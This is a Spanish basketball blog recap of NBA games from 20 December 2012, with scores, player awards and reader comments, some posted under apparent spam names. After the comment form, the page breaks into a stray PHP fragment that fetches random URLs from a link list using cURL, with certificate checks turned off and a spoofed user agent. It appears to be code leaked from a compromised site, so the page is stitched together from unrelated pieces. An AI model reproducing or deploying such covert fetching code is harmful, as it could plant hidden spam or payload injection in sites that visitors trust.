La Crónica: Mejor sin mis estrellas

20 de December de 2012 por Simon

Es lo que deben pensar en Canadá tras la cuarta victoria seguida de los Raptors.  Justo cuando pierden por lesión a sus dos supuestas estrellas empiezan a llegar las victorias y es que hasta el momento la pareja Ed Davis – Calderón está rindiendo mejor que Bargnani – Lowry. Anoche el derrotado fue Detroit Pistons. La primera mitad, como el partido en general,  fue muy igualada como demuestran las tablas que se dieron al descanso. La igualdad se amntuvo durante el tercer cuarto pero en el último rápidamente Toronto cogió  una ventaja de 6-8 puntos que fue capaz de mantener hasta el final.  Por parte de Toronto no sabemos con quien quedarnos, si con los 7 puntos y 17 asistencias de Calderón o los 23 puntos de DeRozan. Ed Davis logró  11 puntos y 9 rebotes para la causa. En Detroit partidazo sin premio de Monroe, 35 puntos y 10 asistencias (91-97

En New York, Carmelo Anthony volvió tras dos partidos de ausencia para ahondar en la crisis de sus vecinos que llevan un parcial de 2-8 en los últimos 10 partidos disputados. El alero volvió  como se fue, en plan MVP. Consiguió 31 puntos para llevar a su equipo a la victoria ante unos Nets que fueron desinflándose poco a poco durante la segunda parte. La primera parte fue jugada de poder a poder con constantes alternativas en el marcador con un juego alegre y vistoso por parte de ambas escuadras pero en el tercer cuarto los Nets no pudieron mantener el ritmo de los Knicks haciendo que la ventaja aumentara poco a poco hasta la conclusión del partido (86-100)

Oklahoma  consiguió su duodécima victoria consecutiva y se quedan a solo dos del récord de la franquicia. Lo lograron ante unos Hawks que plantaron cara y obligaron a el dúo de ases de los Thunder a dar los mejor de sí. En el primer tiempo,  un Westbrook desatado parecía dejar el partido finiquitado con 21 puntos en la primera parte y un +14 para sus Thunder pero los Hawks apretaron los dientes en la reanudación para ir recortando diferencias hasta llegar a ponerse tan solo 4 puntos abajo. Pero en ese punto decidió Durant que se acababa la historia. El angelito acabó el partido con 41 puntos pero 18 cayeron en el último cuarto. Ante semejante vendaval los Hawks no pudieron hacer nada. Los Thunder se encuentran en un gran momento con el mejor Westbrook de siempre, capaz de distribuir al nivel de los mejores en la liga y anotando como él siempre ha sabido. Este jugador cada vez que se le requiere que dé algo más  o  se pone en duda su juego, como sucedió con la marcha de Harden, da un pasito adelante para acallar todas las dudas (100-92).

Otro equipo súper enrachado son Los Angeles Clippers que acumulan 11 victorias consecutivas, la última en casa ante unos débiles New Orleans Hornets. El partido no tuvo historia básicamente desde el principio aunque cuando verdaderamente se rompió fue en el tercer cuarto. El mejor de Clippers fue Paul con 10 puntos, 12 rebotes  y 5 asistencias, Griffin lo acompañó con 18 puntos y desde el banco Crawford anotó 17. Lopez fue el mejor de New Orleans con 22 puntos y 9 rebotes (77-93).

Memphis ganó a Milwaukee Bucks en casa con un doble-doble de Zach Randolph de 15 puntos y 17 rebotes. Fue un partido marcado por la defensa que los Grizzlies dominaron de principio a fin dejando a su rival en tan solo 80 puntos.  A pesar de su gran defensa, Memphis aun tiene que mejorar algo su ofensiva si quieren luchar de verdad por la conferencia Oeste pues tienen muchos problemas para anotar con regularidad. Noche para olvidar de Monta Ellis y 26 puntos pero con malos porcentajes de Jennings (80-90).

Indiana Pacers parece que ha alejado los fantasmas del inicio de temporada y poco a poco va escalando posiciones en el Este, ya están sextos. Ayer consiguieron la victoria de manera clara ante unos Jazz que fuera de casa no son ni la mitad de peligrosos que cuando juegan ante el calor de su público. Al descanso ya eran 22 los puntos de ventaja que tenía Indiana Pacers así que el partido se quedó sin historia en la segunda mitad. Hill y George fueron los mejores de los Pacers con 20 puntos cada uno. Pocos se salvan en Utah ayer pero si tuviéramos que escoger alguno sería Derrick Favors con 16 puntos  y 9 rebotes desde el banquillo. Está pidiendo a gritos más minutos (84-104).

Los Celtics necesitaron al mejor Paul Pierce, que se fue a los 40 puntos, para vencer a Cleveland Cavaliers. El partido transcurrió siempre de forma cómoda para los Celtics gracias también a las buenas actuaciones de Rondo, Terry y Garnett.  . Los Cavs echaron de menos a Anderson Varejao sobretodo bajo los tableros donde no fueron capaces de superar a uno de los peores equipos en este apartado. Irving fue como casi siempre el mejor de los Cavs con 22 puntos. Sorprendentemente Jason Collins fue titular (91-103).

En el resto de la jornada, tres equipos se fueron por encima de los 120 puntos sin necesidad de prórrogas. Houston ganó  en casa a Philadelphia  (103-125) de la mano de su Big Three particular, Harden, Asik y, finalmente, Lin, que parece que poco a poco va mejorando en su rendimiento. Sacramento ganó a Golden State Warriors en un partido entretenidísimo en el que ambos equipos se olvidaron de defender e hicieron la fiesta del ataque. Cousins fue el mejor de Sacramento con 24 puntos. Ambos equipos clavaron el 50% de tiros de campo (127-131). Phoenix apalizó a Charlotte, que llevan 13 partidos palmando, con 26 puntos de Shannon Brown (104-121).

Finalmente, Orlando venció  a Washington (83-90) en un partido bastante pobre en el que Orlando perdió a Glen Davis al final del partido por lesión.

PREMIOS

MVP: Sublime actuación de Paul Pierce: 40 puntos con un ¡13 de 16! en tiros de campo y 8 rebotes, 5 asistencias, 3 robos y 1 tapón de regalo. Incluso los 41 puntos y 13 asistencias de Kevin Durant palidecen a su lado aunque anotar 18 puntos en el último cuarto está a la altura de muy poquitos.

Rookie: Michael “De todo y bien” Kidd-Gilchtrist anotó 25 puntos, cogió 12 rebotes, repartió 4 asistencias, robó 3 balones y puso en tapón. Todo en 36 minutos y sin cometer ni una pérdida.

Sorpresa: Jarrett Jack ha encajado como un guante en los Warriors y su presencia en la pista es básica para entender el buen hacer de su equipo. Ayer anotó 28 puntos y cogió 7 rebotes.

Decepción: Monta Ellis nos dejó una de esas noches terribles que sufre de vez en cuando. Solo anotó 1 de sus 14 lanzamientos a canasta y acabó con 4 puntos.

Esfuerzo en vano: Da la impresión que Greg Monroe está algo más flojo que el año pasado pero su actuación de ayer fue de nivel: 35 puntos y 10 rebotes para el pívot de los Pistons.

EL DATO

Stephen Curry anotó 32 puntos, David Lee 29 y Jarrett Jack 28 pero los Warriors perdieron. Hacía 18 años que un equipo con 3 jugadores anotando más de 28 puntos no conseguía la victoria. Fue en 1995 y le pasó a los Blazers de Strickland, Robinson y Drexler.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Partido para confirmar tendencias en NY.
    Mientras los Knicks recuperaron a un Melo en plan MVP y Chandler se comía al bueno de Brook Lopez con patatas confirmando que los Knicks saben muy bien a lo que juegan sus vecinos Nets empiezan a hacer aguas por todos lados. Con un Deron Williams que no está rayando al nivel esperado el equipo mueve el balón pero le falta algo para ganar partidos. Crisis en los Nets que veremos como arreglan.
    Del resto de partidos enorme Durantula y “The Truth” Pierce al que todavía le queda calidad para maltratar a algún equipo como los Cavs. Buena victoria de Memphis y enrachadísmos que andan los Clippers que ni necesitan que un jugador se salga para ganar comodamente sus partidos (Odom empieza a recordar como se juega a esto)… y todavía les faltan Billups y Grant Hill… ¿Quien dijo candidatos al anillo? Por otra parte decepción esta vez los Warriors, que no fueron capaces de ganar a un equipo como los Kings y es que a veces sin defensa no te llega. Aún así temporadón hasta ahora de los de la Bahía californiana

      Citar

  2. rojorob dice:
    #2

    Increíbles los números de Kidd-Gilchtrist, que no se veían en la Liga desde 1973.

      Citar

  3. Ruxixón dice:
    #3

    Muy bien Jack en estas dos últimas temporadas,la verdad.Alejándose de aquel jugador insulso de los Blazers de McMIllan,ha conseguido encontrar este año un rol que le encaja como anillo al dedo al jugador:6º hombre.

    Ese rol es el que anda buscando el bueno de Doc.Creo que en el anterior partido puso a Courtney Lee de titular para que Terry saliese desde el banquillo y en este encuentro ha sido Bass quien ha tenido que liderar la segunda unidad.Eso es lo que le falta a Boston y evidencia que lo están buscando.

    ¿Puede ser una de las temporadas donde más importante sea el factor banquillo?Hay equipos muy profundos y otros muy limitados,y hoy día encontrar la rotación ideal para el balance titulares-suplentes,jugadores que aporten mucho desde el banco…parece que es un factor clave.

    PD.una pena lo de Bobcats,este si es un equipo que no se merece llevar tantas derrotas seguidas.Espero que sean pacientes porque el rumbo del equipo esta temporada es bueno.Paciencia y que los jugadores sigan luchando cada partido,que no bajen los brazos.

      Citar

  4. pronosticos apuestas dice:
    #4

    Increíble Pual Pierce. Año tras año le dan por acabado y siempre nos deja alguna sorpresita como esta. Más que los 40 puntos que anota (marca no tan habitual) es el porcentaje de tiro que no se suele ver en la NBA. 13 de 16 en tiros de campo. Que crack!!

      Citar

  5. cepillos oral b dice:
    #5

    De vez en cuando se ven sorpresas como esta, pero no olvidemos la importancia de la regularidad de ciertos jugadores que temporada tras temporada dejan mucho que desear ha sido sorprendente si pero habra que seguir viendo como evoluciona en los siguientes partidos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>